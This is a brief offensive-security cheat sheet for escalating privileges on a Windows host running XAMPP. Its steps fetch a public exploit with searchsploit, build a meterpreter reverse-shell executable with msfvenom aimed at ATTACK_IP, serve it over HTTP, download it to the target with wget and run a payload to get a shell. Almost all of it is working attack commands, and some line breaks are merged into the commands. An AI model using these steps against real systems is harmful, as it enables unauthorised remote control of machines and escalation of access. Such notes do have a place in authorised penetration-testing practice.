XAMPP Privilege Escalation
1) Check XAMPP Version
type C:\xampp\properties.ini2) Searchsploit
searchsploit -m 503373) Craft the payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=ATTACK_IP LPORT=PORT -f exe > msf.exe4) Host the .ps1 file and your .exe payload on your HTTP server
python3 -m http.server 805) Download payload
mkdir C:\temp
wget http://ATTACK_IP/msf.exe -O C:\temp\msf.exe6) Open a listener on Metasploit
7) Run the .ps1 payload and wait for your shell
Last updated